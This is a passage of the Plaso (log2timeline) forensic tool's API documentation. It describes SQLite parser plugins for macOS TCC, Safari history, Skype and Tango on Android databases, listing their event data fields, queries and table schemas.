interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. QUERIES = [('SELECT service, client, allowed, prompt_count, last_modified FROM access;', 'ParseTCCEntry')]

5.1. Subpackages 291 Plaso (log2timeline), Release 20210606

REQUIRED_STRUCTURE = {'access': frozenset({'allowed', 'client', 'last_modified', 'prompt_count', 'service'}), 'access_overrides': frozenset({}), 'active_policy': frozenset({}), 'admin': frozenset({}), 'expired': frozenset({}), 'policies': frozenset({})} SCHEMAS = [{'access': "CREATE TABLE access ( service TEXT NOT NULL, client TEXT NOT NULL, client_type INTEGER NOT NULL, allowed INTEGER NOT NULL, prompt_count INTEGER NOT NULL, csreq BLOB, policy_id INTEGER, indirect_object_identifier_type INTEGER, indirect_object_identifier TEXT, indirect_object_code_identity BLOB, flags INTEGER, last_modified INTEGER NOT NULL DEFAULT (CAST(strftime('%s','now') AS INTEGER)), PRIMARY KEY (service, client, client_type, indirect_object_identifier), FOREIGN KEY (policy_id) REFERENCES policies(id) ON DELETE CASCADE ON UPDATE CASCADE)", 'access_overrides': 'CREATE TABLE access_overrides ( service TEXT NOT NULL PRIMARY KEY)', 'active_policy': 'CREATE TABLE active_policy ( client TEXT NOT NULL, client_type INTEGER NOT NULL, policy_id INTEGER NOT NULL, PRIMARY KEY (client, client_type), FOREIGN KEY (policy_id) REFERENCES policies(id) ON DELETE CASCADE ON UPDATE CASCADE)', 'admin': 'CREATE TABLE admin (key TEXT PRIMARY KEY NOT NULL, value INTEGER NOT NULL)', 'expired': "CREATE TABLE expired ( service TEXT NOT NULL, client TEXT NOT NULL, client_type INTEGER NOT NULL, csreq BLOB, last_modified INTEGER NOT NULL , expired_at INTEGER NOT NULL DEFAULT (CAST(strftime('%s','now') AS INTEGER)), PRIMARY KEY (service, client, client_type))", 'policies': 'CREATE TABLE policies ( id INTEGER NOT NULL PRIMARY KEY, bundle_id TEXT NOT NULL, uuid TEXT NOT NULL, display TEXT NOT NULL, UNIQUE (bundle_id, uuid))'}] plaso.parsers.sqlite_plugins.safari module

SQLite parser plugin for Safari history database files. class plaso.parsers.sqlite_plugins.safari.SafariHistoryPageVisitedEventData Bases: plaso.containers.events.EventData Safari history event data. host hostname of the server. Type str offset identifier of the row, from which the event data was extracted. Type str query SQL query that was used to obtain the event data. Type str title title of the webpage visited. Type str url URL visited. Type str visit_count number of times the website was visited.

292 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

Type int was_http_non_get True if the webpage was visited using a non-GET HTTP request. Type bool DATA_TYPE = 'safari:history:visit_sqlite' class plaso.parsers.sqlite_plugins.safari.SafariHistoryPluginSqlite Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Safari history database files. The Safari history database file is typically stored in: History.db DATA_FORMAT = 'Safari history SQLite database (History.db) file' NAME = 'safari_historydb' ParsePageVisitRow(parser_mediator, query, row, **unused_kwargs) Parses a visited row. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row. QUERIES = [('SELECT history_items.id, history_items.url, history_items.visit_count, history_visits.id AS visit_id, history_visits.history_item,history_visits.visit_time, history_visits.redirect_destination, history_visits.title, history_visits.http_non_get, history_visits.redirect_source FROM history_items, history_visits WHERE history_items.id = history_visits.history_item ORDER BY history_visits.visit_time', 'ParsePageVisitRow')] REQUIRED_STRUCTURE = {'history_items': frozenset({'id', 'url', 'visit_count'}), 'history_visits': frozenset({'history_item', 'http_non_get', 'id', 'redirect_destination', 'redirect_source', 'title', 'visit_time'})}

5.1. Subpackages 293 Plaso (log2timeline), Release 20210606

SCHEMAS = [{'history_client_versions': 'CREATE TABLE history_client_versions (client_version INTEGER PRIMARY KEY,last_seen REAL NOT NULL)', 'history_event_listeners': 'CREATE TABLE history_event_listeners (listener_name TEXT PRIMARY KEY NOT NULL UNIQUE,last_seen REAL NOT NULL)', 'history_events': 'CREATE TABLE history_events (id INTEGER PRIMARY KEY AUTOINCREMENT,event_type TEXT NOT NULL,event_time REAL NOT NULL,pending_listeners TEXT NOT NULL,value BLOB)', 'history_items': 'CREATE TABLE history_items (id INTEGER PRIMARY KEY AUTOINCREMENT,url TEXT NOT NULL UNIQUE,domain_expansion TEXT NULL,visit_count INTEGER NOT NULL,daily_visit_counts BLOB NOT NULL,weekly_visit_counts BLOB NULL,autocomplete_triggers BLOB NULL,should_recompute_derived_visit_counts INTEGER NOT NULL,visit_count_score INTEGER NOT NULL)', 'history_tombstones': 'CREATE TABLE history_tombstones (id INTEGER PRIMARY KEY AUTOINCREMENT,start_time REAL NOT NULL,end_time REAL NOT NULL,url TEXT,generation INTEGER NOT NULL DEFAULT 0)', 'history_visits': 'CREATE TABLE history_visits (id INTEGER PRIMARY KEY AUTOINCREMENT,history_item INTEGER NOT NULL REFERENCES history_items(id) ON DELETE CASCADE,visit_time REAL NOT NULL,title TEXT NULL,load_successful BOOLEAN NOT NULL DEFAULT 1,http_non_get BOOLEAN NOT NULL DEFAULT 0,synthesized BOOLEAN NOT NULL DEFAULT 0,redirect_source INTEGER NULL UNIQUE REFERENCES history_visits(id) ON DELETE CASCADE,redirect_destination INTEGER NULL UNIQUE REFERENCES history_visits(id) ON DELETE CASCADE,origin INTEGER NOT NULL DEFAULT 0,generation INTEGER NOT NULL DEFAULT 0,attributes INTEGER NOT NULL DEFAULT 0,score INTEGER NOT NULL DEFAULT 0)', 'metadata': 'CREATE TABLE metadata (key TEXT NOT NULL UNIQUE, value)'}] plaso.parsers.sqlite_plugins.skype module

SQLite parser plugin for Skype database files. class plaso.parsers.sqlite_plugins.skype.SkypeAccountEventData Bases: plaso.containers.events.EventData Skype account event data. country home country of the account holder. Type str display_name display name of the account holder. Type str email registered email address of the account holder. Type str offset identifier of the row, from which the event data was extracted. Type str query SQL query that was used to obtain the event data. Type str

294 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

username full name of the Skype account holder and display name. Type str DATA_TYPE = 'skype:event:account' class plaso.parsers.sqlite_plugins.skype.SkypeCallEventData Bases: plaso.containers.events.EventData Skype call event data. call_type call type, such as: WAITING, STARTED, FINISHED. Type str dst_call account which received the call. Type str offset identifier of the row, from which the event data was extracted. Type str query SQL query that was used to obtain the event data. Type str src_call account which started the call. Type str user_start_call True if the owner account started the call. Type bool video_conference True if the call was a video conference. Type bool DATA_TYPE = 'skype:event:call' class plaso.parsers.sqlite_plugins.skype.SkypeChatEventData Bases: plaso.containers.events.EventData Skype chat event data. from_account from display name and the author. Type str query SQL query that was used to obtain the event data. Type str text body XML.

5.1. Subpackages 295 Plaso (log2timeline), Release 20210606

Type str title title. Type str to_account accounts, excluding the author, of the conversation. Type str DATA_TYPE = 'skype:event:chat' class plaso.parsers.sqlite_plugins.skype.SkypePlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Skype database files. DATA_FORMAT = 'Skype SQLite database (main.db) file' NAME = 'skype' ParseAccountInformation(parser_mediator, query, row, **unused_kwargs) Parses account information. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row with account information. ParseCall(parser_mediator, query, row, **unused_kwargs) Parses a call. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (Optional[str]) – query that created the row. • row (sqlite3.Row) – row resulting from query. • query – query. ParseChat(parser_mediator, query, row, **unused_kwargs) Parses a chat message. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row resulting from query. ParseFileTransfer(parser_mediator, query, row, cache=None, database=None, **unused_kwargs) Parses a file transfer. There is no direct relationship between who sends the file and who accepts the file. Parameters

296 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row resulting from query. • cache (Optional[SQLiteCache]) – cache. • database (Optional[SQLiteDatabase]) – database. ParseSMS(parser_mediator, query, row, **unused_kwargs) Parses an SMS. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row resulting from query. QUERIES = [('SELECT c.id, c.participants, c.friendlyname AS title, m.author AS author, m.from_dispname AS from_displayname, m.body_xml, m.timestamp, c.dialog_partner FROM Chats c, Messages m WHERE c.name = m.chatname', 'ParseChat'), ('SELECT id, fullname, given_displayname, emails, country, profile_timestamp, authreq_timestamp, lastonline_timestamp, mood_timestamp, sent_authrequest_time, lastused_timestamp FROM Accounts', 'ParseAccountInformation'), ('SELECT id, target_numbers AS dstnum_sms, timestamp AS time_sms, body AS msg_sms FROM SMSes', 'ParseSMS'), ('SELECT id, partner_handle, partner_dispname, offer_send_list, starttime, accepttime, finishtime, filepath, filename, filesize, status, parent_id, pk_id FROM Transfers', 'ParseFileTransfer'), ('SELECT c.id, cm.guid, c.is_incoming, cm.call_db_id, cm.videostatus, c.begin_timestamp AS try_call, cm.start_timestamp AS accept_call, cm.call_duration FROM Calls c, CallMembers cm WHERE c.id = cm.call_db_id;', 'ParseCall')] QUERY_DEST_FROM_TRANSFER = 'SELECT parent_id, partner_handle AS skypeid, partner_dispname AS skypename FROM transfers' QUERY_SOURCE_FROM_TRANSFER = 'SELECT pk_id, partner_handle AS skypeid, partner_dispname AS skypename FROM transfers' REQUIRED_STRUCTURE = {'Accounts': frozenset({'authreq_timestamp', 'country', 'emails', 'fullname', 'given_displayname', 'id', 'lastonline_timestamp', 'mood_timestamp', 'profile_timestamp', 'sent_authrequest_time'}), 'CallMembers': frozenset({'call_db_id', 'call_duration', 'guid', 'start_timestamp', 'videostatus'}), 'Calls': frozenset({'begin_timestamp', 'id', 'is_incoming'}), 'Chats': frozenset({'dialog_partner', 'friendlyname', 'id', 'name', 'participants'}), 'Messages': frozenset({'author', 'body_xml', 'chatname', 'from_dispname', 'timestamp'}), 'SMSes': frozenset({'body', 'id', 'target_numbers', 'timestamp'}), 'Transfers': frozenset({'accepttime', 'filename', 'filepath', 'filesize', 'finishtime', 'id', 'offer_send_list', 'parent_id', 'partner_dispname', 'partner_handle', 'pk_id', 'starttime', 'status'})}

5.1. Subpackages 297 Plaso (log2timeline), Release 20210606

SCHEMAS = [{'Accounts': 'CREATE TABLE Accounts (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, status INTEGER, pwdchangestatus INTEGER, logoutreason INTEGER, commitstatus INTEGER, suggested_skypename TEXT, skypeout_balance_currency TEXT, skypeout_balance INTEGER, skypeout_precision INTEGER, skypein_numbers TEXT, subscriptions TEXT, cblsyncstatus INTEGER, offline_callforward TEXT, chat_policy INTEGER, skype_call_policy INTEGER, pstn_call_policy INTEGER, avatar_policy INTEGER, buddycount_policy INTEGER, timezone_policy INTEGER, webpresence_policy INTEGER, phonenumbers_policy INTEGER, voicemail_policy INTEGER, authrequest_policy INTEGER, ad_policy INTEGER, partner_optedout TEXT, service_provider_info TEXT, registration_timestamp INTEGER, nr_of_other_instances INTEGER, partner_channel_status TEXT, flamingo_xmpp_status INTEGER, federated_presence_policy INTEGER, liveid_membername TEXT, roaming_history_enabled INTEGER, cobrand_id INTEGER, owner_under_legal_age INTEGER, type INTEGER, skypename TEXT, pstnnumber TEXT, fullname TEXT, birthday INTEGER, gender INTEGER, languages TEXT, country TEXT, province TEXT, city TEXT, phone_home TEXT, phone_office TEXT, phone_mobile TEXT, emails TEXT, homepage TEXT, about TEXT, profile_timestamp INTEGER, received_authrequest TEXT, displayname TEXT, refreshing INTEGER, given_authlevel INTEGER, aliases TEXT, authreq_timestamp INTEGER, mood_text TEXT, timezone INTEGER, nrof_authed_buddies INTEGER, ipcountry TEXT, given_displayname TEXT, availability INTEGER, lastonline_timestamp INTEGER, capabilities BLOB, avatar_image BLOB, assigned_speeddial TEXT, lastused_timestamp INTEGER, authrequest_count INTEGER, assigned_comment TEXT, alertstring TEXT, avatar_timestamp INTEGER, mood_timestamp INTEGER, rich_mood_text TEXT, synced_email BLOB, set_availability INTEGER, options_change_future BLOB, cbl_profile_blob BLOB, authorized_time INTEGER, sent_authrequest TEXT, sent_authrequest_time INTEGER, sent_authrequest_serial INTEGER, buddyblob BLOB, cbl_future BLOB, node_capabilities INTEGER, node_capabilities_and INTEGER, revoked_auth INTEGER, added_in_shared_group INTEGER, in_shared_group INTEGER, authreq_history BLOB, profile_attachments BLOB, stack_version INTEGER, offline_authreq_id INTEGER, verified_email BLOB, verified_company BLOB, uses_jcs INTEGER)', 'Alerts': 'CREATE TABLE Alerts (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, timestamp INTEGER, partner_name TEXT, is_unseen INTEGER, partner_id INTEGER, partner_event TEXT, partner_history TEXT, partner_header TEXT, partner_logo TEXT, meta_expiry INTEGER, message_header_caption TEXT, message_header_title TEXT, message_header_subject TEXT, message_header_cancel TEXT, message_header_later TEXT, message_content TEXT, message_footer TEXT, message_button_caption TEXT, message_button_uri TEXT, message_type INTEGER, window_size INTEGER, chatmsg_guid BLOB, notification_id INTEGER, event_flags INTEGER, extprop_hide_from_history INTEGER)', 'AppSchemaVersion': 'CREATE TABLE AppSchemaVersion (ClientVersion TEXT NOT NULL, SQLiteSchemaVersion INTEGER NOT NULL, SchemaUpdateType INTEGER NOT NULL)', 'CallMembers': 'CREATE TABLE CallMembers (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, identity TEXT, dispname TEXT, languages TEXT, call_duration INTEGER, price_per_minute INTEGER, price_precision INTEGER, price_currency TEXT, payment_category TEXT, type INTEGER, status INTEGER, failurereason INTEGER, sounderror_code INTEGER, soundlevel INTEGER, pstn_statustext TEXT, pstn_feedback TEXT, forward_targets TEXT, forwarded_by TEXT, debuginfo TEXT, videostatus INTEGER, target_identity TEXT, mike_status INTEGER, is_read_only INTEGER, quality_status INTEGER, call_name TEXT, transfer_status INTEGER, transfer_active INTEGER, transferred_by TEXT, transferred_to TEXT, guid TEXT, next_redial_time INTEGER, nrof_redials_done INTEGER, nrof_redials_left INTEGER, transfer_topic TEXT, real_identity TEXT, start_timestamp INTEGER, is_conference INTEGER, quality_problems TEXT, identity_type INTEGER, country TEXT, creation_timestamp INTEGER, stats_xml TEXT, is_premium_video_sponsor INTEGER, is_multiparty_video_capable INTEGER, recovery_in_progress INTEGER, nonse_word TEXT, nr_of_delivered_push_notifications INTEGER, call_session_guid TEXT, version_string TEXT, pk_status INTEGER, call_db_id INTEGER, prime_status INTEGER)', 'Calls': 'CREATE TABLE Calls (id INTEGER NOT NULL 298 PRIMARY KEY, is_permanent INTEGER, begin_timestamp INTEGER, topicChapter TEXT, 5. plaso is_muted package INTEGER, is_unseen_missed INTEGER, host_identity TEXT, mike_status INTEGER, duration INTEGER, soundlevel INTEGER, access_token TEXT, active_members INTEGER, is_active INTEGER, name TEXT, video_disabled INTEGER, joined_existing INTEGER, server_identity TEXT, vaa_input_status INTEGER, is_incoming INTEGER, is_conference INTEGER, is_on_hold INTEGER, start_timestamp INTEGER, quality_problems TEXT, current_video_audience TEXT, premium_video_status INTEGER, premium_video_is_grace_period INTEGER, is_premium_video_sponsor INTEGER, premium_video_sponsor_list TEXT, old_members BLOB, partner_handle TEXT, partner_dispname TEXT, type INTEGER, status INTEGER, failurereason INTEGER, failurecode INTEGER, pstn_number TEXT, old_duration INTEGER, conf_participants BLOB, pstn_status TEXT, members BLOB, conv_dbid INTEGER)', 'ChatMembers': 'CREATE TABLE ChatMembers (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, chatname TEXT, identity TEXT, role INTEGER, is_active INTEGER, cur_activities INTEGER, adder TEXT)', 'Chats': 'CREATE TABLE Chats (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, name TEXT, options INTEGER, friendlyname TEXT, description TEXT, timestamp INTEGER, activity_timestamp INTEGER, dialog_partner TEXT, adder TEXT, type INTEGER, mystatus INTEGER, myrole INTEGER, posters TEXT, participants TEXT, applicants TEXT, banned_users TEXT, name_text TEXT, topic TEXT, topic_xml TEXT, guidelines TEXT, picture BLOB, alertstring TEXT, is_bookmarked INTEGER, passwordhint TEXT, unconsumed_suppressed_msg INTEGER, unconsumed_normal_msg INTEGER, unconsumed_elevated_msg INTEGER, unconsumed_msg_voice INTEGER, activemembers TEXT, state_data BLOB, lifesigns INTEGER, last_change INTEGER, first_unread_message INTEGER, pk_type INTEGER, dbpath TEXT, split_friendlyname TEXT, conv_dbid INTEGER)', 'ContactGroups': 'CREATE TABLE ContactGroups (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, type INTEGER, custom_group_id INTEGER, given_displayname TEXT, nrofcontacts INTEGER, nrofcontacts_online INTEGER, given_sortorder INTEGER, type_old INTEGER, proposer TEXT, description TEXT, associated_chat TEXT, members TEXT, cbl_id INTEGER, cbl_blob BLOB, fixed INTEGER, keep_sharedgroup_contacts INTEGER, chats TEXT, extprop_is_hidden INTEGER, extprop_sortorder_value INTEGER, extprop_is_expanded INTEGER)', 'Contacts': 'CREATE TABLE Contacts (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, type INTEGER, skypename TEXT, pstnnumber TEXT, aliases TEXT, fullname TEXT, birthday INTEGER, gender INTEGER, languages TEXT, country TEXT, province TEXT, city TEXT, phone_home TEXT, phone_office TEXT, phone_mobile TEXT, emails TEXT, hashed_emails TEXT, homepage TEXT, about TEXT, avatar_image BLOB, mood_text TEXT, rich_mood_text TEXT, timezone INTEGER, capabilities BLOB, profile_timestamp INTEGER, nrof_authed_buddies INTEGER, ipcountry TEXT, avatar_timestamp INTEGER, mood_timestamp INTEGER, received_authrequest TEXT, authreq_timestamp INTEGER, lastonline_timestamp INTEGER, availability INTEGER, displayname TEXT, refreshing INTEGER, given_authlevel INTEGER, given_displayname TEXT, assigned_speeddial TEXT, assigned_comment TEXT, alertstring TEXT, lastused_timestamp INTEGER, authrequest_count INTEGER, assigned_phone1 TEXT, assigned_phone1_label TEXT, assigned_phone2 TEXT, assigned_phone2_label TEXT, assigned_phone3 TEXT, assigned_phone3_label TEXT, buddystatus INTEGER, isauthorized INTEGER, popularity_ord INTEGER, external_id TEXT, external_system_id TEXT, isblocked INTEGER, authorization_certificate BLOB, certificate_send_count INTEGER, account_modification_serial_nr INTEGER, saved_directory_blob BLOB, nr_of_buddies INTEGER, server_synced INTEGER, contactlist_track INTEGER, last_used_networktime INTEGER, authorized_time INTEGER, sent_authrequest TEXT, sent_authrequest_time INTEGER, sent_authrequest_serial INTEGER, buddyblob BLOB, cbl_future BLOB, node_capabilities INTEGER, revoked_auth INTEGER, added_in_shared_group INTEGER, in_shared_group INTEGER, authreq_history BLOB, profile_attachments BLOB, stack_version INTEGER, offline_authreq_id INTEGER, node_capabilities_and INTEGER, authreq_crc INTEGER, authreq_src INTEGER, pop_score INTEGER, authreq_nodeinfo BLOB, main_phone TEXT, unified_servants TEXT, phone_home_normalized TEXT, phone_office_normalized TEXT, phone_mobile_normalized TEXT, sent_authrequest_initmethod INTEGER, authreq_initmethod INTEGER, verified_email BLOB, verified_company BLOB, sent_authrequest_extrasbitmask INTEGER, liveid_cid TEXT, extprop_seen_birthday INTEGER, extprop_sms_target INTEGER, extprop_external_data TEXT, extprop_must_hide_avatar INTEGER)', 'Conversations': 'CREATE TABLE Conversations (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, identity TEXT, type INTEGER, live_host TEXT, live_start_timestamp INTEGER, live_is_muted INTEGER, alert_string TEXT, is_bookmarked INTEGER, given_displayname TEXT, displayname TEXT, local_livestatus INTEGER, inbox_timestamp INTEGER, inbox_message_id INTEGER, unconsumed_suppressed_messages INTEGER, unconsumed_normal_messages INTEGER, unconsumed_elevated_messages INTEGER, unconsumed_messages_voice INTEGER, active_vm_id INTEGER, context_horizon INTEGER, consumption_horizon INTEGER, last_activity_timestamp INTEGER, active_invoice_message INTEGER, spawned_from_convo_id INTEGER, pinned_order INTEGER, creator TEXT, creation_timestamp INTEGER, my_status INTEGER, opt_joining_enabled INTEGER, opt_access_token TEXT, opt_entry_level_rank INTEGER, opt_disclose_history INTEGER, opt_history_limit_in_days INTEGER, opt_admin_only_activities INTEGER, passwordhint TEXT, meta_name TEXT, meta_topic TEXT, meta_guidelines TEXT, meta_picture BLOB, picture TEXT, is_p2p_migrated INTEGER, premium_video_status INTEGER, premium_video_is_grace_period INTEGER, guid TEXT, dialog_partner TEXT, meta_description TEXT, premium_video_sponsor_list TEXT, mcr_caller TEXT, chat_dbid INTEGER, history_horizon INTEGER, history_sync_state TEXT, thread_version TEXT, consumption_horizon_set_at INTEGER, alt_identity TEXT, extprop_profile_height INTEGER, extprop_chat_width INTEGER, extprop_chat_left_margin INTEGER, extprop_chat_right_margin INTEGER, extprop_entry_height INTEGER, extprop_windowpos_x INTEGER, extprop_windowpos_y INTEGER, extprop_windowpos_w INTEGER, extprop_windowpos_h INTEGER, extprop_window_maximized INTEGER, extprop_window_detached INTEGER, extprop_pinned_order INTEGER, extprop_new_in_inbox INTEGER, extprop_tab_order INTEGER, extprop_video_layout INTEGER, extprop_video_chat_height INTEGER, extprop_chat_avatar INTEGER, extprop_consumption_timestamp INTEGER, extprop_form_visible INTEGER, extprop_recovery_mode INTEGER)', 'DbMeta': 'CREATE TABLE DbMeta (key TEXT NOT NULL PRIMARY KEY, value TEXT)', 'LegacyMessages': 'CREATE TABLE LegacyMessages (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER)', 'Messages': 'CREATE TABLE Messages (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, convo_id INTEGER, chatname TEXT, author TEXT, from_dispname TEXT, author_was_live INTEGER, guid BLOB, dialog_partner TEXT, timestamp INTEGER, type INTEGER, sending_status INTEGER, consumption_status INTEGER, edited_by TEXT, edited_timestamp INTEGER, param_key INTEGER, param_value INTEGER, body_xml TEXT, identities TEXT, reason TEXT, leavereason INTEGER, participant_count INTEGER, error_code INTEGER, chatmsg_type INTEGER, chatmsg_status INTEGER, body_is_rawxml INTEGER, oldoptions INTEGER, newoptions INTEGER, newrole INTEGER, pk_id INTEGER, crc INTEGER, remote_id INTEGER, call_guid TEXT, extprop_contact_review_date TEXT, extprop_contact_received_stamp INTEGER, extprop_contact_reviewed INTEGER)', 'Participants': 'CREATE TABLE Participants (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, convo_id INTEGER, identity TEXT, rank INTEGER, requested_rank INTEGER, text_status INTEGER, voice_status INTEGER, video_status INTEGER, live_identity TEXT, live_price_for_me TEXT, live_fwd_identities TEXT, live_start_timestamp INTEGER, sound_level INTEGER, debuginfo TEXT, next_redial_time INTEGER, nrof_redials_left INTEGER, last_voice_error TEXT, quality_problems TEXT, live_type INTEGER, live_country TEXT, transferred_by TEXT, transferred_to TEXT, adder TEXT, last_leavereason INTEGER, is_premium_video_sponsor INTEGER, is_multiparty_video_capable INTEGER, live_identity_to_use TEXT, livesession_recovery_in_progress INTEGER, is_multiparty_video_updatable INTEGER, real_identity TEXT, extprop_default_identity INTEGER)', 'SMSes': 'CREATE TABLE SMSes (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, type INTEGER, outgoing_reply_type INTEGER, status INTEGER, failurereason INTEGER, is_failed_unseen INTEGER, timestamp INTEGER, price INTEGER, price_precision INTEGER, price_currency TEXT, reply_to_number TEXT, target_numbers TEXT, target_statuses BLOB, body TEXT, chatmsg_id INTEGER, identity TEXT, notification_id INTEGER, event_flags INTEGER, reply_id_number TEXT, convo_name TEXT, extprop_hide_from_history INTEGER, extprop_extended INTEGER)', 'Transfers': 'CREATE TABLE Transfers (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, type INTEGER, partner_handle TEXT, partner_dispname TEXT, status INTEGER, failurereason INTEGER, starttime INTEGER, finishtime INTEGER, filepath TEXT, filename TEXT, filesize TEXT, bytestransferred TEXT, bytespersecond INTEGER, chatmsg_guid BLOB, chatmsg_index INTEGER, convo_id INTEGER, pk_id INTEGER, nodeid BLOB, last_activity INTEGER, flags INTEGER, old_status INTEGER, old_filepath INTEGER, accepttime INTEGER, parent_id INTEGER, offer_send_list TEXT, extprop_localfilename TEXT, extprop_hide_from_history INTEGER, extprop_window_visible INTEGER, extprop_handled_by_chat INTEGER)', 'VideoMessages': 'CREATE TABLE VideoMessages (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, qik_id BLOB, attached_msg_ids TEXT, sharing_id TEXT, status INTEGER, vod_status INTEGER, vod_path TEXT, local_path TEXT, public_link TEXT, progress INTEGER, title TEXT, description TEXT, author TEXT, creation_timestamp INTEGER)', 'Videos': 'CREATE TABLE Videos (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, status INTEGER, error TEXT, debuginfo TEXT, dimensions TEXT, media_type INTEGER, duration_1080 INTEGER, duration_720 INTEGER, duration_hqv INTEGER, duration_vgad2 INTEGER, duration_ltvgad2 INTEGER, timestamp INTEGER, hq_present INTEGER, duration_ss INTEGER, ss_timestamp INTEGER, convo_id INTEGER, device_path TEXT)', 'Voicemails': 'CREATE TABLE Voicemails (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, type INTEGER, partner_handle TEXT, partner_dispname TEXT, status INTEGER, failurereason INTEGER, subject TEXT, timestamp INTEGER, duration INTEGER, allowed_duration INTEGER, playback_progress INTEGER, convo_id INTEGER, chatmsg_guid BLOB, notification_id INTEGER, flags INTEGER, size INTEGER, path TEXT, failures INTEGER, vflags INTEGER, xmsg TEXT, extprop_hide_from_history INTEGER)'}] Plaso (log2timeline), Release 20210606

class plaso.parsers.sqlite_plugins.skype.SkypeSMSEventData Bases: plaso.containers.events.EventData Skype SMS event data. number phone number where the SMS was sent. Type str query SQL query that was used to obtain the event data. Type str text text (SMS body) that was sent. Type str DATA_TYPE = 'skype:event:sms' class plaso.parsers.sqlite_plugins.skype.SkypeTransferFileEventData Bases: plaso.containers.events.EventData Skype file transfer event data. action_type action type such as: “GETSOLICITUDE”, “SENDSOLICITUDE”, “ACCEPTED” or “FINISHED”. Type str destination account that received the file. Type str offset identifier of the row, from which the event data was extracted. Type str query SQL query that was used to obtain the event data. Type str source account that sent the file. Type str transferred_filename name of the file transferred. Type str transferred_filepath path of the file transferred. Type str transferred_filesize size of the file transferred. Type int

5.1. Subpackages 299 Plaso (log2timeline), Release 20210606

DATA_TYPE = 'skype:event:transferfile' plaso.parsers.sqlite_plugins.tango_android module

SQLite parser plugin for Tango on Android database files. class plaso.parsers.sqlite_plugins.tango_android.TangoAndroidContactEventData Bases: plaso.containers.events.EventData Tango on Android contact event data. first_name contact profile first name. Type str last_name contact profile last name. Type str birthday contact profile birthday. Type str gender contact profile gender. Type str status contact status message. Type str distance contact profile distance. Type int is_friend True if the contact is considered a friend. Type bool friend_request_type flag indicating the type of friend request sent for example outRequest for request sent or noRequest forno request. Type str friend_request_message message sent on friend request. Type str DATA_TYPE = 'tango:android:contact' class plaso.parsers.sqlite_plugins.tango_android.TangoAndroidConversationEventData Bases: plaso.containers.events.EventData Tango on Android conversation event data.

300 Chapter 5. plaso package Plaso (log2timeline), Release 20210606

conversation_identifier conversation identifier. Type int DATA_TYPE = 'tango:android:conversation' class plaso.parsers.sqlite_plugins.tango_android.TangoAndroidMessageEventData Bases: plaso.containers.events.EventData Tango on Android message event data. message_identifier message identifier. Type int direction flag indicating direction of the message. Type int DATA_TYPE = 'tango:android:message' class plaso.parsers.sqlite_plugins.tango_android.TangoAndroidProfilePlugin Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin SQLite parser plugin for Tango on Android profile database files. DATA_FORMAT = 'Tango on Android profile SQLite database file' NAME = 'tango_android_profile' ParseContactRow(parser_mediator, query, row, **unused_kwargs) Parses a contact row from the database. Parameters • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs. • query (str) – query that created the row. • row (sqlite3.Row) – row resulting from query. QUERIES = [('SELECT itemLastActiveTime AS last_active_time, itemLastLocalAccessTime AS last_access_time, itemFriendRequestTime AS friend_request_time, itemFirstName AS first_name, itemLastName AS last_name, itemBirthday AS birthday, itemGender AS gender, itemStatus AS status, itemDistance AS distance, itemIsFriend AS friend, itemFriendRequestType AS friend_request_type, itemFriendRequestMessage AS friend_request_message FROM profiletable', 'ParseContactRow')] REQUIRED_STRUCTURE = {'profiletable': frozenset({'itemBirthday', 'itemDistance', 'itemFirstName', 'itemFriendRequestMessage', 'itemFriendRequestTime', 'itemFriendRequestType', 'itemGender', 'itemIsFriend', 'itemLastActiveTime', 'itemLastLocalAccessTime', 'itemLastName', 'itemStatus'})}

5.1. Subpackages 301 Plaso (log2timeline), Release 20210606

